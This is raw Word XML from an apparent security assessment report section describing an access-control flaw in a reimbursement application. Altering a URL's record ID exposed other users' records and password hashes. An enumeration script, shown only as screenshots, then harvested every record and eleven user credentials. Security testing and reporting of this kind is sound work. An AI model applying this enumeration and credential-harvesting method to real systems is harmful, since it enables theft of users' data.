              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658310" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41561E44" wp14:editId="22FD994B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5214938</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>326708</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="638492" cy="23812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638492"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0C2052">
              <v:rect id="Rectangle 120" style="position:absolute;margin-left:410.65pt;margin-top:25.75pt;width:50.25pt;height:18.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172F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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003F7C1D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="223E27EF" wp14:editId="04D90CA9">
            <wp:extent cx="5943600" cy="2119745"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946414" name="Picture 18946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14" name="Picture 18946414" descr="A screenshot of a computer&#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36621"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2119745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0BB0D" w14:textId="46E5FA4C" w:rsidR="006A1B3F" w:rsidRDefault="00BF1C50" w:rsidP="00BF1C50">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="266DBBF7" w14:textId="2EAEE1A6" w:rsidR="006A1B3F" w:rsidRDefault="009D5057" w:rsidP="006A1B3F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc94100254"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Unauthorized Access of Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w14:paraId="4D2CF0A9" w14:textId="224DE1BB" w:rsidR="002C3F9B" w:rsidRPr="002C3F9B" w:rsidRDefault="002C3F9B" w:rsidP="002C3F9B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329EB767" w14:textId="5F190DAA" w:rsidR="00707B82" w:rsidRDefault="00707B82" w:rsidP="007E4F99">
      <w:r>
        <w:t xml:space="preserve">Access control to request for objects was not properly implemented. In another exploit, a user is allowed to view </w:t>
      </w:r>
      <w:r w:rsidR="00BB6489">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>reimbursement records belonging to another user by modifying the hyperlink. Additionally, the records retrieved contain sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A61D37" w14:textId="33F23B84" w:rsidR="00C165AC" w:rsidRPr="00C165AC" w:rsidRDefault="00C165AC" w:rsidP="007E4F99">
      <w:r>
        <w:t xml:space="preserve">As seen in the </w:t>
      </w:r>
      <w:r w:rsidR="00AD2AEC">
        <w:t>testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> section, the restriction to view records </w:t>
      </w:r>
      <w:r w:rsidR="004229FA">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> not properly implemented. Upon analyzing the client-side JavaScript code, a URL was seen that makes a request to retrieve a record based on its ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D0D474" w14:textId="46E5FA4C" w:rsidR="00C9460C" w:rsidRDefault="00120BA7" w:rsidP="006A1B3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658311" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D1CAC62" wp14:editId="45C4ECAF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>342899</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2193926</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1662113" cy="95250"/>
                <wp:effectExtent l="0" t="0" r="14605" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="123" name="Rectangle 123"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1662113"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E6FA55">
              <v:rect id="Rectangle 123" style="position:absolute;margin-left:27pt;margin-top:172.75pt;width:130.9pt;height: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B595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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C165AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EB8BC6B" wp14:editId="0CE8D93F">
            <wp:extent cx="5943600" cy="3344545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="18946416" name="Picture 189464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6416"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126">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092D7B95" w14:textId="46E5FA4C" w:rsidR="00BF1C50" w:rsidRDefault="00BF1C50" w:rsidP="007E4F99"/>
    <w:p w14:paraId="74A04181" w14:textId="0BE770DD" w:rsidR="00C9460C" w:rsidRDefault="00623DD0" w:rsidP="007E4F99">
      <w:r>
        <w:t xml:space="preserve">Adding the ID of the current record at the back of the URL </w:t>
      </w:r>
      <w:r w:rsidR="00E810E1">
        <w:t xml:space="preserve">revealed </w:t>
      </w:r>
      <w:r w:rsidR="005C39C4">
        <w:t xml:space="preserve">information about the </w:t>
      </w:r>
      <w:r w:rsidR="000A5374">
        <w:t xml:space="preserve">record as well as sensitive information about the user. As seen below, the password </w:t>
      </w:r>
      <w:r w:rsidR="004251CD">
        <w:t xml:space="preserve">hash </w:t>
      </w:r>
      <w:r w:rsidR="000A5374">
        <w:t>of the user that created that record was shown.</w:t>
      </w:r>
      <w:r w:rsidR="00697989" w:rsidRPr="00697989">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137C1BCF" w14:textId="48E174B9" w:rsidR="00321243" w:rsidRDefault="00697989" w:rsidP="006A1B3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3293CD59" wp14:editId="67DE4F05">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2552699</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>349250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3228975" cy="104458"/>
                <wp:effectExtent l="0" t="0" r="28575" b="10160"/>
                <wp:wrapNone/>
                <wp:docPr id="124" name="Rectangle 124"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3228975" cy="1044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C68620">
              <v:rect id="Rectangle 124" style="position:absolute;margin-left:201pt;margin-top:27.5pt;width:254.25pt;height:8.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27A2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v/hAIAAGk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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C9460C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31AF7B47" wp14:editId="7F76F100">
            <wp:extent cx="5940054" cy="592853"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="18946418" name="Picture 189464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18" name="Picture 18946418" descr="Graphical user interface, application, Word&#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82263"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="593207"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1E2CA9" w14:textId="77777777" w:rsidR="00261432" w:rsidRDefault="00261432" w:rsidP="006A1B3F"/>
    <w:p w14:paraId="4CA5D312" w14:textId="6AE07FE8" w:rsidR="00321243" w:rsidRDefault="00AE6418" w:rsidP="007E4F99">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Since knowing that </w:t>
      </w:r>
      <w:r w:rsidR="00780CE6">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>records can be accessed</w:t>
      </w:r>
      <w:r w:rsidR="00670E8E">
        <w:t xml:space="preserve"> by unauthorized users</w:t>
      </w:r>
      <w:r w:rsidR="00393DBC">
        <w:t xml:space="preserve">, all information </w:t>
      </w:r>
      <w:r w:rsidR="0043479C">
        <w:t>in the reimbursement table can be retrieved by writing a script.</w:t>
      </w:r>
      <w:r w:rsidR="00AB53A8">
        <w:t xml:space="preserve"> As seen below, the script makes a request to the URL and </w:t>
      </w:r>
      <w:r w:rsidR="00B47348">
        <w:t>enumerates</w:t>
      </w:r>
      <w:r w:rsidR="00AB53A8">
        <w:t xml:space="preserve"> the ID from 0 to</w:t>
      </w:r>
      <w:r w:rsidR="00EE3558">
        <w:t xml:space="preserve"> the maximum </w:t>
      </w:r>
      <w:r w:rsidR="00D74988">
        <w:t>index set, which in this case is 199</w:t>
      </w:r>
      <w:r w:rsidR="0070308C">
        <w:t xml:space="preserve"> (200 is not included)</w:t>
      </w:r>
      <w:r w:rsidR="007B37D7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BC1DEF">
        <w:t xml:space="preserve"> It reads the data requested and converts it into a JSON format which is then stored on the attacker’s </w:t>
      </w:r>
      <w:r w:rsidR="00B32D86">
        <w:t>local directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F5C5C" w14:textId="63EE92BC" w:rsidR="00AB53A8" w:rsidRPr="006A1B3F" w:rsidRDefault="00AB53A8" w:rsidP="006A1B3F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="436CDA53" wp14:editId="0C038656">
            <wp:extent cx="5941994" cy="1532531"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="18946419" name="Picture 18946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19" name="Picture 18946419" descr="Text&#10;&#10;Description automatically generate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6183" b="47983"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1532945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A42F89" w14:textId="77777777" w:rsidR="00290062" w:rsidRDefault="00290062" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373AD6DD" w14:textId="216A87D0" w:rsidR="00290062" w:rsidRDefault="00290062" w:rsidP="007E4F99">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is important to note that a valid session </w:t>
      </w:r>
      <w:r w:rsidR="002B47FA">
        <w:t xml:space="preserve">ID must be present to </w:t>
      </w:r>
      <w:r w:rsidR="78AF6644">
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidR="002B47FA">
        <w:t xml:space="preserve"> access to the data in the URL.</w:t>
      </w:r>
      <w:r w:rsidR="00512D42">
        <w:t xml:space="preserve"> The cookie can be easily retrieved using a Cookie editor tool as seen below.</w:t>
      </w:r>
      <w:r w:rsidR="00B565DF" w:rsidRPr="00B565DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239FE6D0" w14:textId="2205D871" w:rsidR="00512D42" w:rsidRDefault="00B565DF" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658313" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E7FE976" wp14:editId="4246FB92">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4133532</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>815340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1376362" cy="285750"/>
                <wp:effectExtent l="0" t="0" r="14605" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="125" name="Rectangle 125"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1376362"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8879FB">
              <v:rect id="Rectangle 125" style="position:absolute;margin-left:325.45pt;margin-top:64.2pt;width:108.35pt;height:22.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9EBC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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00512D42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E9E7B6B" wp14:editId="3CAF42F6">
            <wp:extent cx="5943600" cy="1858489"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="18946420" name="Picture 189464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0" name="Picture 18946420" descr="Graphical user interface, application, website&#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44432"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1858489"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F6FF56" w14:textId="77777777" w:rsidR="00F642B9" w:rsidRDefault="00F642B9" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E08112B" w14:textId="77777777" w:rsidR="00F77294" w:rsidRDefault="00F77294">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AF9861" w14:textId="692C2804" w:rsidR="00DB72C6" w:rsidRDefault="00C576F9" w:rsidP="002B52CD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Upon completion of running the script, </w:t>
      </w:r>
      <w:r w:rsidR="00617A97">
        <w:t>it successfully retrieved all records in the reimbursement table as seen below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17564E94" w14:textId="03BF405E" w:rsidR="00F642B9" w:rsidRDefault="00BA1A5D" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36CAADC3" wp14:editId="61716FE9">
            <wp:extent cx="5943600" cy="3344545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="18946400" name="Picture 189464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00" name="Picture 18946400" descr="Graphical user interface, text, applicatio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89413AE" w14:textId="63637563" w:rsidR="00BA1A5D" w:rsidRDefault="00BA1A5D" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CA0CD7F" wp14:editId="79EE3A78">
            <wp:extent cx="5943600" cy="3344545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="18946401" name="Picture 189464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01" name="Picture 18946401" descr="A screenshot of a computer&#10;&#10;Description automatically generated with low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EF9DA8B" w14:textId="77777777" w:rsidR="00BA1A5D" w:rsidRDefault="00BA1A5D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45988D36" w14:textId="4345FCA3" w:rsidR="00DB72C6" w:rsidRDefault="00DB72C6" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>For this exploit, ID 76 was viewed and all information regarding the reimbursement and the user that created the record was retrieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E2F75" w14:textId="263E955C" w:rsidR="004B352F" w:rsidRDefault="00DB72C6" w:rsidP="00DB72C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6E5FA1" wp14:editId="60D98EC1">
            <wp:extent cx="2505075" cy="3143490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946424" name="Picture 189464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4" name="Picture 18946424" descr="Text&#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5948" r="57848"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2505350" cy="3143835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC993A2" w14:textId="77777777" w:rsidR="00DB72C6" w:rsidRDefault="00DB72C6" w:rsidP="00DB72C6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280A7476" w14:textId="2736E4BF" w:rsidR="00D1626C" w:rsidRDefault="003756A6" w:rsidP="00990A47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using this information, the script can be further modified to only retrieve all </w:t>
      </w:r>
      <w:r w:rsidR="0014049F">
        <w:t xml:space="preserve">credentials in the </w:t>
      </w:r>
      <w:r w:rsidR="001A1957">
        <w:t>Reimbursement table</w:t>
      </w:r>
      <w:r w:rsidR="00D1626C">
        <w:t xml:space="preserve"> as seen below.</w:t>
      </w:r>
      <w:r w:rsidR="00B87ACA">
        <w:t xml:space="preserve"> Instead of getting all data, the program only retrieves the Employee name, username, password, and email address.</w:t>
      </w:r>
      <w:r w:rsidR="006728FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D648A6">
        <w:t xml:space="preserve">The script also checks for duplication of users based on its ID. </w:t>
      </w:r>
      <w:r w:rsidR="006728FB">
        <w:t>The results are then stored in a C</w:t>
      </w:r>
      <w:r w:rsidR="006B283E">
        <w:t>omma</w:t>
      </w:r>
      <w:r w:rsidR="000F3DF2">
        <w:t>-s</w:t>
      </w:r>
      <w:r w:rsidR="006B283E">
        <w:t xml:space="preserve">eparated </w:t>
      </w:r>
      <w:r w:rsidR="006728FB">
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="006B283E">
        <w:t>alue</w:t>
      </w:r>
      <w:r w:rsidR="000F3DF2">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006B283E">
        <w:t xml:space="preserve"> (CSV)</w:t>
      </w:r>
      <w:r w:rsidR="006728FB">
        <w:t xml:space="preserve"> file on the attacker’s </w:t>
      </w:r>
      <w:r w:rsidR="00CF1EBF">
        <w:t>machine.</w:t>
      </w:r>
      <w:r w:rsidR="00204851">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C4429" w14:textId="0B1DE360" w:rsidR="00DA670E" w:rsidRDefault="00D1626C" w:rsidP="00B87FD9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74832E10" wp14:editId="1F0F029F">
            <wp:extent cx="5468415" cy="2498394"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946425" name="Picture 189464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5" name="Picture 18946425" descr="Text&#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6205" b="12557"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5483607" cy="2505335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E55A483" w14:textId="0BEA8C79" w:rsidR="00DA670E" w:rsidRDefault="00DA670E" w:rsidP="00990A47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Upon completion of executing the script</w:t>
      </w:r>
      <w:r w:rsidR="00724DEA">
        <w:t xml:space="preserve">, 11 distinct </w:t>
      </w:r>
      <w:r w:rsidR="008A1BE0">
        <w:t xml:space="preserve">user credentials </w:t>
      </w:r>
      <w:r w:rsidR="006F2CA4">
        <w:t>wer</w:t>
      </w:r>
      <w:r w:rsidR="008A1BE0">
        <w:t>e harvested</w:t>
      </w:r>
      <w:r w:rsidR="0071676E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4887B746" w14:textId="04E2E52E" w:rsidR="00724DEA" w:rsidRDefault="006F2CA4" w:rsidP="00DF2817">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658315" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="760D8079" wp14:editId="1CD72320">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>90488</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>253048</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1604962" cy="2700337"/>
                <wp:effectExtent l="0" t="0" r="14605" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="126" name="Rectangle 126"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1604962" cy="27003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4A2F63">
              <v:rect id="Rectangle 126" style="position:absolute;margin-left:7.15pt;margin-top:19.95pt;width:126.35pt;height:212.6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3277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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00724DEA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F7EC093" wp14:editId="0CAE76FC">
            <wp:extent cx="5724249" cy="3219278"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="18946429" name="Picture 189464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9" name="Picture 18946429" descr="A screenshot of a computer&#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28179" cy="3221488"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A6DE9" w14:textId="77777777" w:rsidR="00703D4D" w:rsidRDefault="00703D4D" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A65CA29" w14:textId="03B34E93" w:rsidR="00703D4D" w:rsidRDefault="00703D4D" w:rsidP="00990A47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
